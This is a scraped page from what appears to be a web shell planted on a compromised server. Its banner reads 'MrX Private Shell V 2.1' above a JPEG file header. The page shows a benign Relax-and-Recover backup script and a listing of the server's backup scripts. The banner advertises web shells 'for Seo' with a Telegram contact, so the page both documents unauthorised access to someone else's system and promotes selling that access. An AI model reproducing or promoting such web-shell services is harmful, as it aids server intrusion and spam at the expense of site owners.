����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Create $OUTPUT_PREFIX directory. # The $OUTPUT_PREFIX directory defaults to $HOSTNAME. # # This happens usually under a mounted network filesystem share # e.g. in case of OUTPUT_URL=nfs://NFS.server.IP.address/remote/nfs/share # but it is also happens for local stuff like OUTPUT_URL=usb:///dev/disk/by-label/REAR-000 # Do not do this for tapes and special attention for file:///path local scheme="$( url_scheme "$OUTPUT_URL" )" local path="$( url_path "$OUTPUT_URL" )" # If filesystem access to url is unsupported return silently (e.g. scheme tape) scheme_supports_filesystem $scheme || return 0 local opath="$( output_path "$scheme" "$path" )" # Create $OUTPUT_PREFIX sub-directory. # That directory should be neither world-readable nor world-writable # because it contains confidential data. In particular it may contain # the backup of (almost) all files of the system: mkdir -p $v -m0750 "$opath" && return # A failure to create the $OUTPUT_PREFIX sub-directory is fatal: Error "Failed to create '$opath' directory for OUTPUT_URL=$OUTPUT_URL"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 010_set_umask.sh | File | 303 B | 0644 |
|
| 100_mount_output_path.sh | File | 189 B | 0644 |
|
| 150_save_copy_of_prefix_dir.sh | File | 967 B | 0644 |
|
| 200_make_boot_dir.sh | File | 144 B | 0644 |
|
| 200_make_prefix_dir.sh | File | 1.03 KB | 0644 |
|
| 250_create_lock.sh | File | 614 B | 0644 |
|
| 400_copy_disk_struct_files.sh | File | 772 B | 0644 |
|
| 940_grub2_rescue.sh | File | 16.33 KB | 0644 |
|
| 940_grub_rescue.sh | File | 3.68 KB | 0644 |
|
| 950_copy_result_files.sh | File | 8.82 KB | 0644 |
|
| 950_email_result_files.sh | File | 1.4 KB | 0644 |
|
| 970_remove_lock.sh | File | 452 B | 0644 |
|
| 980_umount_output_dir.sh | File | 200 B | 0644 |
|